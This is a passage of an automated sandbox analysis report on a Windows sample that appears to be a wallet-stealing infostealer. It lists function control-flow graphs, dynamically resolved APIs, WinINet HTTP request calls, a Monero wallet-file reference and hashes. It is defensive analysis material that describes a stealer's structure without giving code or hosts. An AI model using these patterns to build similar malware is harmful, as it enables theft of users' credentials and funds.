                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 9f4e2748ed2548846afcde3b16dc92b5fb90885117c7c19c068a274846c3752d
                                  • Instruction ID: b89fc32d2a3e0e66126297b8325f5b0ffb477943728779966bcb122a6b169070
                                  • Opcode Fuzzy Hash: 9f4e2748ed2548846afcde3b16dc92b5fb90885117c7c19c068a274846c3752d
                                  • Instruction Fuzzy Hash: F8D05E7490930C9FCB00DFE198496DDBBB8BB08225F400594D90972240EA305485CB65
                                  Function 00BB9F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 bb9f20-bb9f2a 634 bb9f30-bba341 GetProcAddress * 43 633->634 635 bba346-bba3da LoadLibraryA * 8 633->635 634->635 636 bba3dc-bba451 GetProcAddress * 5 635->636 637 bba456-bba45d 635->637 636->637 638 bba463-bba521 GetProcAddress * 8 637->638 639 bba526-bba52d 637->639 638->639 640 bba5a8-bba5af 639->640 641 bba52f-bba5a3 GetProcAddress * 5 639->641 642 bba647-bba64e 640->642 643 bba5b5-bba642 GetProcAddress * 6 640->643 641->640 644 bba72f-bba736 642->644 645 bba654-bba72a GetProcAddress * 9 642->645 643->642 646 bba738-bba7ad GetProcAddress * 5 644->646 647 bba7b2-bba7b9 644->647 645->644 646->647 648 bba7bb-bba7e7 GetProcAddress * 2 647->648 649 bba7ec-bba7f3 647->649 648->649 650 bba825-bba82c 649->650 651 bba7f5-bba820 GetProcAddress * 2 649->651 652 bba922-bba929 650->652 653 bba832-bba91d GetProcAddress * 10 650->653 651->650 654 bba92b-bba988 GetProcAddress * 4 652->654 655 bba98d-bba994 652->655 653->652 654->655 656 bba9ae-bba9b5 655->656 657 bba996-bba9a9 GetProcAddress 655->657 658 bbaa18-bbaa19 656->658 659 bba9b7-bbaa13 GetProcAddress * 4 656->659 657->656 659->658
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,012F70A8), ref: 00BB9F3D
                                  • GetProcAddress.KERNEL32(75900000,012F70C8), ref: 00BB9F55
                                  • GetProcAddress.KERNEL32(75900000,01309B48), ref: 00BB9F6E
                                  • GetProcAddress.KERNEL32(75900000,01309AA0), ref: 00BB9F86
                                  • GetProcAddress.KERNEL32(75900000,0130D500), ref: 00BB9F9E
                                  • GetProcAddress.KERNEL32(75900000,0130D5F0), ref: 00BB9FB7
                                  • GetProcAddress.KERNEL32(75900000,012FBFE8), ref: 00BB9FCF
                                  • GetProcAddress.KERNEL32(75900000,0130D410), ref: 00BB9FE7
                                  • GetProcAddress.KERNEL32(75900000,0130D5C0), ref: 00BBA000
                                  • GetProcAddress.KERNEL32(75900000,0130D560), ref: 00BBA018
                                  • GetProcAddress.KERNEL32(75900000,0130D5D8), ref: 00BBA030
                                  • GetProcAddress.KERNEL32(75900000,012F6F48), ref: 00BBA049
                                  • GetProcAddress.KERNEL32(75900000,012F6F88), ref: 00BBA061
                                  • GetProcAddress.KERNEL32(75900000,012F71E8), ref: 00BBA079
                                  • GetProcAddress.KERNEL32(75900000,012F6FA8), ref: 00BBA092
                                  • GetProcAddress.KERNEL32(75900000,0130D350), ref: 00BBA0AA
                                  • GetProcAddress.KERNEL32(75900000,0130D608), ref: 00BBA0C2
                                  • GetProcAddress.KERNEL32(75900000,012FBF48), ref: 00BBA0DB
                                  • GetProcAddress.KERNEL32(75900000,012F7208), ref: 00BBA0F3
                                  • GetProcAddress.KERNEL32(75900000,0130D620), ref: 00BBA10B
                                  • GetProcAddress.KERNEL32(75900000,0130D530), ref: 00BBA124
                                  • GetProcAddress.KERNEL32(75900000,0130D440), ref: 00BBA13C
                                  • GetProcAddress.KERNEL32(75900000,0130D638), ref: 00BBA154
                                  • GetProcAddress.KERNEL32(75900000,012F70E8), ref: 00BBA16D
                                  • GetProcAddress.KERNEL32(75900000,0130D368), ref: 00BBA185
                                  • GetProcAddress.KERNEL32(75900000,0130D3C8), ref: 00BBA19D
                                  • GetProcAddress.KERNEL32(75900000,0130D4B8), ref: 00BBA1B6
                                  • GetProcAddress.KERNEL32(75900000,0130D380), ref: 00BBA1CE
                                  • GetProcAddress.KERNEL32(75900000,0130D398), ref: 00BBA1E6
                                  • GetProcAddress.KERNEL32(75900000,0130D3B0), ref: 00BBA1FF
                                  • GetProcAddress.KERNEL32(75900000,0130D4E8), ref: 00BBA217
                                  • GetProcAddress.KERNEL32(75900000,0130D4D0), ref: 00BBA22F
                                  • GetProcAddress.KERNEL32(75900000,0130D518), ref: 00BBA248
                                  • GetProcAddress.KERNEL32(75900000,0130A988), ref: 00BBA260
                                  • GetProcAddress.KERNEL32(75900000,0130D3E0), ref: 00BBA278
                                  • GetProcAddress.KERNEL32(75900000,0130D3F8), ref: 00BBA291
                                  • GetProcAddress.KERNEL32(75900000,012F7108), ref: 00BBA2A9
                                  • GetProcAddress.KERNEL32(75900000,0130D548), ref: 00BBA2C1
                                  • GetProcAddress.KERNEL32(75900000,012F7128), ref: 00BBA2DA
                                  • GetProcAddress.KERNEL32(75900000,0130D578), ref: 00BBA2F2
                                  • GetProcAddress.KERNEL32(75900000,0130D428), ref: 00BBA30A
                                  • GetProcAddress.KERNEL32(75900000,012F7148), ref: 00BBA323
                                  • GetProcAddress.KERNEL32(75900000,012F7168), ref: 00BBA33B
                                  • LoadLibraryA.KERNEL32(0130D458,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA34D
                                  • LoadLibraryA.KERNEL32(0130D470,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA35E
                                  • LoadLibraryA.KERNEL32(0130D488,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA370
                                  • LoadLibraryA.KERNEL32(0130D4A0,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA382
                                  • LoadLibraryA.KERNEL32(0130D590,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA393
                                  • LoadLibraryA.KERNEL32(0130D5A8,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA3A5
                                  • LoadLibraryA.KERNEL32(0130D7A0,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA3B7
                                  • LoadLibraryA.KERNEL32(0130D740,?,00BB5EF3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE7), ref: 00BBA3C8
                                  • GetProcAddress.KERNEL32(75FD0000,012F73C8), ref: 00BBA3EA
                                  • GetProcAddress.KERNEL32(75FD0000,0130D680), ref: 00BBA402
                                  • GetProcAddress.KERNEL32(75FD0000,01309398), ref: 00BBA41A
                                  • GetProcAddress.KERNEL32(75FD0000,0130D818), ref: 00BBA433
                                  • GetProcAddress.KERNEL32(75FD0000,012F73A8), ref: 00BBA44B
                                  • GetProcAddress.KERNEL32(734B0000,012FBE08), ref: 00BBA470
                                  • GetProcAddress.KERNEL32(734B0000,012F7428), ref: 00BBA489
                                  • GetProcAddress.KERNEL32(734B0000,012FBAE8), ref: 00BBA4A1
                                  • GetProcAddress.KERNEL32(734B0000,0130D6C8), ref: 00BBA4B9
                                  • GetProcAddress.KERNEL32(734B0000,0130D788), ref: 00BBA4D2
                                  • GetProcAddress.KERNEL32(734B0000,012F7588), ref: 00BBA4EA
                                  • GetProcAddress.KERNEL32(734B0000,012F74E8), ref: 00BBA502
                                  • GetProcAddress.KERNEL32(734B0000,0130D830), ref: 00BBA51B
                                  • GetProcAddress.KERNEL32(763B0000,012F74A8), ref: 00BBA53C
                                  • GetProcAddress.KERNEL32(763B0000,012F73E8), ref: 00BBA554
                                  • GetProcAddress.KERNEL32(763B0000,0130D938), ref: 00BBA56D
                                  • GetProcAddress.KERNEL32(763B0000,0130D860), ref: 00BBA585
                                  • GetProcAddress.KERNEL32(763B0000,012F7528), ref: 00BBA59D
                                  • GetProcAddress.KERNEL32(750F0000,012FBC78), ref: 00BBA5C3
                                  • GetProcAddress.KERNEL32(750F0000,012FBBD8), ref: 00BBA5DB
                                  • GetProcAddress.KERNEL32(750F0000,0130D890), ref: 00BBA5F3
                                  • GetProcAddress.KERNEL32(750F0000,012F7488), ref: 00BBA60C
                                  • GetProcAddress.KERNEL32(750F0000,012F75A8), ref: 00BBA624
                                  • GetProcAddress.KERNEL32(750F0000,012FBC00), ref: 00BBA63C
                                  • GetProcAddress.KERNEL32(75A50000,0130D770), ref: 00BBA662
                                  • GetProcAddress.KERNEL32(75A50000,012F7448), ref: 00BBA67A
                                  • GetProcAddress.KERNEL32(75A50000,013093A8), ref: 00BBA692
                                  • GetProcAddress.KERNEL32(75A50000,0130D7E8), ref: 00BBA6AB
                                  • GetProcAddress.KERNEL32(75A50000,0130D8A8), ref: 00BBA6C3
                                  • GetProcAddress.KERNEL32(75A50000,012F72C8), ref: 00BBA6DB
                                  • GetProcAddress.KERNEL32(75A50000,012F7508), ref: 00BBA6F4
                                  • GetProcAddress.KERNEL32(75A50000,0130D710), ref: 00BBA70C
                                  • GetProcAddress.KERNEL32(75A50000,0130D848), ref: 00BBA724
                                  • GetProcAddress.KERNEL32(75070000,012F7468), ref: 00BBA746
                                  • GetProcAddress.KERNEL32(75070000,0130D878), ref: 00BBA75E
                                  • GetProcAddress.KERNEL32(75070000,0130D800), ref: 00BBA776
                                  • GetProcAddress.KERNEL32(75070000,0130D8C0), ref: 00BBA78F
                                  • GetProcAddress.KERNEL32(75070000,0130D7B8), ref: 00BBA7A7
                                  • GetProcAddress.KERNEL32(74E50000,012F7408), ref: 00BBA7C8
                                  • GetProcAddress.KERNEL32(74E50000,012F72E8), ref: 00BBA7E1
                                  • GetProcAddress.KERNEL32(75320000,012F74C8), ref: 00BBA802
                                  • GetProcAddress.KERNEL32(75320000,0130D7D0), ref: 00BBA81A
                                  • GetProcAddress.KERNEL32(6F060000,012F7548), ref: 00BBA840
                                  • GetProcAddress.KERNEL32(6F060000,012F7328), ref: 00BBA858
                                  • GetProcAddress.KERNEL32(6F060000,012F7308), ref: 00BBA870
                                  • GetProcAddress.KERNEL32(6F060000,0130D8D8), ref: 00BBA889
                                  • GetProcAddress.KERNEL32(6F060000,012F7368), ref: 00BBA8A1
                                  • GetProcAddress.KERNEL32(6F060000,012F72A8), ref: 00BBA8B9
                                  • GetProcAddress.KERNEL32(6F060000,012F7348), ref: 00BBA8D2
                                  • GetProcAddress.KERNEL32(6F060000,012F7568), ref: 00BBA8EA
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00BBA901
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00BBA917
                                  • GetProcAddress.KERNEL32(74E00000,0130D8F0), ref: 00BBA939
                                  • GetProcAddress.KERNEL32(74E00000,01309478), ref: 00BBA951
                                  • GetProcAddress.KERNEL32(74E00000,0130D908), ref: 00BBA969
                                  • GetProcAddress.KERNEL32(74E00000,0130D758), ref: 00BBA982
                                  • GetProcAddress.KERNEL32(74DF0000,012F75E8), ref: 00BBA9A3
                                  • GetProcAddress.KERNEL32(6F9C0000,0130D920), ref: 00BBA9C4
                                  • GetProcAddress.KERNEL32(6F9C0000,012F7608), ref: 00BBA9DD
                                  • GetProcAddress.KERNEL32(6F9C0000,0130D650), ref: 00BBA9F5
                                  • GetProcAddress.KERNEL32(6F9C0000,0130D668), ref: 00BBAA0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: ebd21827cdc6af02b688e0571b2a4d420ba3d7037f1a10575572bf05101c49ec
                                  • Instruction ID: 9496052ef8715ca04b55dda1a969687ce87c9b180d84b51b28f3eebe83398ee2
                                  • Opcode Fuzzy Hash: ebd21827cdc6af02b688e0571b2a4d420ba3d7037f1a10575572bf05101c49ec
                                  • Instruction Fuzzy Hash: F3629DB561A6419FC344DFABFC889167BB9B74D345340852ABA9DE3230DB7099C8CF60
                                  Function 00BA48D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 ba48d0-ba4992 call bbaab0 call ba4800 call bbaa50 * 5 InternetOpenA StrCmpCA 816 ba499b-ba499f 801->816 817 ba4994 801->817 818 ba4f1b-ba4f43 InternetCloseHandle call bbade0 call baa210 816->818 819 ba49a5-ba4b1d call bb8cf0 call bbac30 call bbabb0 call bbab10 * 2 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbac30 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbac30 call bbabb0 call bbab10 * 2 InternetConnectA 816->819 817->816 829 ba4f82-ba4ff2 call bb8b20 * 2 call bbaab0 call bbab10 * 8 818->829 830 ba4f45-ba4f7d call bbab30 call bbacc0 call bbabb0 call bbab10 818->830 819->818 905 ba4b23-ba4b27 819->905 830->829 906 ba4b29-ba4b33 905->906 907 ba4b35 905->907 908 ba4b3f-ba4b72 HttpOpenRequestA 906->908 907->908 909 ba4b78-ba4e78 call bbacc0 call bbabb0 call bbab10 call bbac30 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbac30 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbac30 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbacc0 call bbabb0 call bbab10 call bbac30 call bbabb0 call bbab10 call bbaa50 call bbac30 * 2 call bbabb0 call bbab10 * 2 call bbade0 lstrlen call bbade0 * 2 lstrlen call bbade0 HttpSendRequestA 908->909 910 ba4f0e-ba4f15 InternetCloseHandle 908->910 1021 ba4e82-ba4eac InternetReadFile 909->1021 910->818 1022 ba4eae-ba4eb5 1021->1022 1023 ba4eb7-ba4f09 InternetCloseHandle call bbab10 1021->1023 1022->1023 1025 ba4eb9-ba4ef7 call bbacc0 call bbabb0 call bbab10 1022->1025 1023->910 1025->1021
                                  APIs
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4889
                                    • Part of subcall function 00BA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4899
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BA4965
                                  • StrCmpCA.SHLWAPI(?,0130EE58), ref: 00BA498A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA4B0A
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00BC0DDE,00000000,?,?,00000000,?,",00000000,?,0130EDD8), ref: 00BA4E38
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BA4E54
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BA4E68
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BA4E99
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA4EFD
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA4F15
                                  • HttpOpenRequestA.WININET(00000000,0130EE68,?,0130E828,00000000,00000000,00400100,00000000), ref: 00BA4B65
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA4F1F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: e01c0f644863ed9c792e769a4f3a3d375e62bbda95adfcb6d6045361c9c2b954
                                  • Instruction ID: 9d75194a5c3b11e9c6a71426ec257bdfdf3ec657a408897124e57b3f5e89b744
                                  • Opcode Fuzzy Hash: e01c0f644863ed9c792e769a4f3a3d375e62bbda95adfcb6d6045361c9c2b954
                                  • Instruction Fuzzy Hash: CE12C772D10118ABCB25EB90DDA2FEEB7B9AF55300F5045D9B11672091EFB06B48CB62
                                  Function 00BB5760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 bb5760-bb57c7 call bb5d20 call bbab30 * 3 call bbaa50 * 4 1106 bb57cc-bb57d3 1090->1106 1107 bb5827-bb589c call bbaa50 * 2 call ba1590 call bb5510 call bbabb0 call bbab10 call bbade0 StrCmpCA 1106->1107 1108 bb57d5-bb5806 call bbab30 call bbaab0 call ba1590 call bb5440 1106->1108 1134 bb58e3-bb58f9 call bbade0 StrCmpCA 1107->1134 1138 bb589e-bb58de call bbaab0 call ba1590 call bb5440 call bbabb0 call bbab10 1107->1138 1124 bb580b-bb5822 call bbabb0 call bbab10 1108->1124 1124->1134 1139 bb58ff-bb5906 1134->1139 1140 bb5a2c-bb5a94 call bbabb0 call bbab30 * 2 call ba16b0 call bbab10 * 4 call ba1670 call ba1550 1134->1140 1138->1134 1142 bb5a2a-bb5aaf call bbade0 StrCmpCA 1139->1142 1143 bb590c-bb5913 1139->1143 1269 bb5d13-bb5d16 1140->1269 1162 bb5be1-bb5c49 call bbabb0 call bbab30 * 2 call ba16b0 call bbab10 * 4 call ba1670 call ba1550 1142->1162 1163 bb5ab5-bb5abc 1142->1163 1147 bb596e-bb59e3 call bbaa50 * 2 call ba1590 call bb5510 call bbabb0 call bbab10 call bbade0 StrCmpCA 1143->1147 1148 bb5915-bb5969 call bbab30 call bbaab0 call ba1590 call bb5440 call bbabb0 call bbab10 1143->1148 1147->1142 1246 bb59e5-bb5a25 call bbaab0 call ba1590 call bb5440 call bbabb0 call bbab10 1147->1246 1148->1142 1162->1269 1169 bb5bdf-bb5c64 call bbade0 StrCmpCA 1163->1169 1170 bb5ac2-bb5ac9 1163->1170 1198 bb5c78-bb5ce1 call bbabb0 call bbab30 * 2 call ba16b0 call bbab10 * 4 call ba1670 call ba1550 1169->1198 1199 bb5c66-bb5c71 Sleep 1169->1199 1177 bb5acb-bb5b1e call bbab30 call bbaab0 call ba1590 call bb5440 call bbabb0 call bbab10 1170->1177 1178 bb5b23-bb5b98 call bbaa50 * 2 call ba1590 call bb5510 call bbabb0 call bbab10 call bbade0 StrCmpCA 1170->1178 1177->1169 1178->1169 1275 bb5b9a-bb5bda call bbaab0 call ba1590 call bb5440 call bbabb0 call bbab10 1178->1275 1198->1269 1199->1106 1246->1142 1275->1169
                                  APIs
                                    • Part of subcall function 00BBAB30: lstrlen.KERNEL32(00BA4F55,?,?,00BA4F55,00BC0DDF), ref: 00BBAB3B
                                    • Part of subcall function 00BBAB30: lstrcpy.KERNEL32(00BC0DDF,00000000), ref: 00BBAB95
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5894
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB58F1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5AA7
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BB5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5478
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BB5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5568
                                    • Part of subcall function 00BB5510: lstrlen.KERNEL32(00000000), ref: 00BB557F
                                    • Part of subcall function 00BB5510: StrStrA.SHLWAPI(00000000,00000000), ref: 00BB55B4
                                    • Part of subcall function 00BB5510: lstrlen.KERNEL32(00000000), ref: 00BB55D3
                                    • Part of subcall function 00BB5510: lstrlen.KERNEL32(00000000), ref: 00BB55FE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB59DB
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5B90
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5C5C
                                  • Sleep.KERNEL32(0000EA60), ref: 00BB5C6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: 305a351eae42f6f5d5562b33f3840bfc1ca297de8b9cc642725c07738ca6ed0a
                                  • Instruction ID: afe060ae1e842d8ac6303af391da2b051ceddd48c7927f3464683fdc5633d131
                                  • Opcode Fuzzy Hash: 305a351eae42f6f5d5562b33f3840bfc1ca297de8b9cc642725c07738ca6ed0a
                                  • Instruction Fuzzy Hash: 52E10F71E10504ABCB24FBA4DDA3EFD77B9AF54300F4085E8B51666191EFB06A4CCB62
                                  Function 00BB19F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
